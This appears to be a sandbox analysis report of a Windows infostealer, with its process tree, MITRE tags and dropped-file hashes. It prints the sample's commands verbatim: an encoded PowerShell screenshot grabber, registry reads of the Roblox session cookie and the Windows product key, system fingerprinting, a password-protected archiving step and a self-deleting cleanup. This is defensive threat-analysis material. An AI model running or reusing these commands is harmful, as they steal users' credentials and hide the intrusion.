C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:5028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3312 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d5w4if3b\d5w4if3b.cmdline"5⤵PID:4968
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES56F9.tmp" "c:\Users\Admin\AppData\Local\Temp\d5w4if3b\CSC86CCA3C9AAB940A2BABEDC64879E02F.TMP"6⤵PID:1528
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3932
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3664
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:3732
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2176 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:3048
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5044 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3620
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3736
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3464
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2652
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4904 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4928
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4648
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2128
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4036
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1304
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:412
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:1016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2000 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:4348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1604 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:532
-
C:\Windows\system32\getmac.exegetmac4⤵PID:2324
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI8842\rar.exe a -r -hp"blackexe" "C:\Users\Admin\AppData\Local\Temp\R9g0r.zip" *"3⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI8842\rar.exe a -r -hp"blackexe" "C:\Users\Admin\AppData\Local\Temp\R9g0r.zip" *4⤵
- Executes dropped EXE
PID:1700 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:4640
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:3380
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:2936
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:5044
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:3204
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:4804
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:1252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:784 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:1544
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:812 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:4968
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1528
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3516 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe""3⤵PID:3720
-
C:\Windows\system32\PING.EXEping localhost -n 34⤵
- Runs ping.exe
PID:2188
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD58a1d5945d69caaa5ad4650aa92416db8
SHA1fce5ff33231a7b99c4e54afac0b356aa72c86aef
SHA256536f6c89e5a645ed4b13768d4e63be2900f010b341e04729e79c04af7af1d567
SHA51204a94cfc967dccb836f2a51b86f861f77421f57bfc6826b00a63a86df995e0e873b38a5c930a15a173b3ea4e768776a13860206468d1bb7ec614ce93f8143cc2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57501b957609b244cbd89b29c26443ffb
SHA1554b181404b94a7baefbd0219195bd67d17f4794
SHA256a7178081fdfd14852f143505399efb91273be5d86b35916a9fc13f53b5a6c3f8
SHA51231ffc7c3feb5b3203da326ab667db3080fadb0d06a8328365d49654a0d1f7061b583fd328a59cda4ea97c6be2fbea2da3a0cca97ec0bbdd6d105ed2e3136c8d0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
C:\Users\Admin\AppData\Local\Temp\RES56F9.tmpFilesize
1KB
MD5b107763cb5405a20ca7cb73ae9c5cf77
SHA146ed8ca4b4365860f719055a198e4782e9c7aa4e
SHA25671097ef49723c9764efc082498734cf64044df31403c51759b5af851a90d3220
SHA512b34c511d027ccfaaf895eab8974adeb7aac7cda3f3b2f6f41102f6808aa6a6fa2e36c94479093f66573988887dd3e6bfdb3ddd559518670418c67bf93cd92b54
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\VCRUNTIME140.dllFilesize
94KB
MD5a87575e7cf8967e481241f13940ee4f7
SHA1879098b8a353a39e16c79e6479195d43ce98629e
SHA256ded5adaa94341e6c62aea03845762591666381dca30eb7c17261dd154121b83e
SHA512e112f267ae4c9a592d0dd2a19b50187eb13e25f23ded74c2e6ccde458bcdaee99f4e3e0a00baf0e3362167ae7b7fe4f96ecbcd265cc584c1c3a4d1ac316e92f0
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_bz2.pydFilesize
43KB
MD552e9fde32cb021eb3fc4c5f4138eeacc
SHA133887c44fa0f729120effb64fb39baad3c36e22a
SHA2567fdfb1e06602983d58a70ab37697dd57e343cfc5b0a0f66a5b3cdc3bffd4a691
SHA512bcd2c895da624951f6606dbfb27d27941436363e1d05eee498bb94189cadc24d2e3fd5636569129388e06f5cf9be0aa4d8965aff6190338bb06b9572ab8cbee6
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_ctypes.pydFilesize
54KB
MD5e1abde07979f598e3f280c59ed50a44b
SHA19169944889a0da8f30cff5242e03418a0a060246
SHA2565eb68a6cb85bc535faa009d984e2b7f99f150c9a7e754deff9321a98e380000b
SHA512ca0635d91f4568a6684e92101d7c875f49d2592597acaf2696fcba16b776b3a2431382b01de2473567c2c6640a96090d289c2c82a10bea44ed8ee0b912cddab4
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_decimal.pydFilesize
101KB
MD51a2a0e2af5fde9e85636e43e4a73471a
SHA1f708ce0b3616ab3b29f66ce4800e20c2ec730048
SHA2567957053a3abe0e2b2239f8df59917343b10c14bb46d33f366ce660380c08c5d3
SHA512159c093bc947565eaf08cc2b7d3d1d1b9fdb6f6b5fa42413372bed5bd045c18acca0c5774d2ca7e4fdf4180a77ec52fb90f869209fad00cdabe05024c6f22c02
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_hashlib.pydFilesize
31KB
MD58bc6f365d6db7b8da29e56230f5be575
SHA1a8a52c11707123ef65028ef4d3d629ef8bc623bc
SHA256cf717e5f8d83fc1aa3c417f814a77ee0ec83c5dc010a1a39131cb22532e50aee
SHA5129fe14343b39f58f70fd1f44fe603276b878f40b74fc1f8891fcd3693be017f8393a1f34375cc399204b10a2551664b7a7b244688b56ab98b96688d6baa9962e7
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_lzma.pydFilesize
81KB
MD50b4682f21e0cbd58b229c3bf4c87e58e
SHA1644aafb1511c580819bfc2e4840f9a879590b3ef
SHA256260c9c9a7b8f0cf7f391d1bca5c9e3eed1d275a2b2a7056c8ef22fea4682e0ab
SHA51287a1c3a44dd3889ebfc1704b3d9c6a1def067ca113edc57101e9df5bf50a4951aad295eebed75ecd3afd2bc448219373a3d757b22dcf7a00f66150b162a8ec6d
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_queue.pydFilesize
21KB
MD55ddf5bc6b73fead41d4df46cc80e5ca5
SHA1dd856ad90cb93f4764c28f8a9c889e16a65c546a
SHA2565ca402d9461cb58adc9a5610c906d7c53eb154dce2b9ad3680ed5ad86d2a6d35
SHA512ac15ce29cc072f4f8031786f750ef86bdbc044f5d89df57979cf97efc6c021cb86a86a98b5939f56e9d6f71f7d6862d5b9af0d6a0a6a404d042ba0ce061c5fa1
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_socket.pydFilesize
38KB
MD565003f3d63e947ec96c9a2c519a93f1d
SHA11ee3c9fd90eb3e1415d0ac798175e46dba684c80
SHA256754e05d4bdd623096826e21f1212cf82f5bcfeff5aeb9fadec94afd36f304de3
SHA51294003881ea7734e8d349c08c2320299bddb49e954f808e032903c34ab7031ba479c940625a90475f826f2c3c67e8b106b647b20bd5a6f0ce03003b1d26cc4a90
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_sqlite3.pydFilesize
45KB
MD51e87bcfbf181171e2a364a8ab029a0e3
SHA1c7c70521d6f265d78815a652d521c8286b39fb0c
SHA25638874a6e05327d61bd6b76094a4596c4382018cab93c95beecfc8ced62b814dd
SHA5127df08363f70e89bbf7bf8eacb6fac4676cc327432031be97018bf0813c2bcf2503c1a515fbcae49d934259eeb98753f27a46aa93bae65b6f07fa4de8db11a77a
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_ssl.pydFilesize
58KB
MD56890cf4a41154fd5eb741aab2f871abe
SHA199a13272975913959bb6f558009172f328840809
SHA256f5da1fdb25fbd540e22c9a9cb037a6586f5500407b7ab2202c01a85e7ffc60c7
SHA5121ffde8bf417fba246de4c8384fc6e0a84eeb2a2a36e76d26bd76218653e3a452be7ac0a6f41b4d20c58c7b5b640d41ad7f1bb9f7eaebf54b7d893c9b1c595b94
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\base_library.zipFilesize
858KB
MD5ba9562ca1b287c33cd28fdc4bf937bac
SHA1348dc56670b0d64f314ddf1d87fba637eb3781b1
SHA256132df278615808a6835977303df21a8f1c44afb1d60cbea1d28040cdd3152c50
SHA5129a5e01220de9849b38a398060feb05f14d714cdc773dc2f985d765736ec7515d5eecbc1d31511f4ba29c1d8ffc71c90ea158c0f301ebf861196ca7819d16282f
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\blank.aesFilesize
78KB
MD553b39c1db558e2512d586de9ba31a0a7
SHA1bae6e65538a493636aee37c70f88775a6aedc28c
SHA25622fa23e16a1989e98dc79237273776af5dc434af0dd13ef06ab3f55d31a143d3
SHA5125b54bd6dc42613dc62e0cc5fccff7acbcba8ef6357cdfb4a33fe7e3cfb9933670908d07a9081d5c75934a8c70e3631ff5ad62cb4d1cb32b579bf7f091d9ac37f
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\libcrypto-1_1.dllFilesize
1.1MB
MD53cc020baceac3b73366002445731705a
SHA16d332ab68dca5c4094ed2ee3c91f8503d9522ac1
SHA256d1aa265861d23a9b76f16906940d30f3a65c5d0597107ecb3d2e6d470b401bb8
SHA5121d9b46d0331ed5b95dda8734abe3c0bd6f7fb1ec9a3269feab618d661a1644a0dc3bf8ac91778d5e45406d185965898fe87abd3261a6f7f2968c43515a48562c
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\libffi-7.dllFilesize
23KB
MD56f818913fafe8e4df7fedc46131f201f
SHA1bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA2563f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA5125473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\libssl-1_1.dllFilesize
200KB
MD57f77a090cb42609f2efc55ddc1ee8fd5
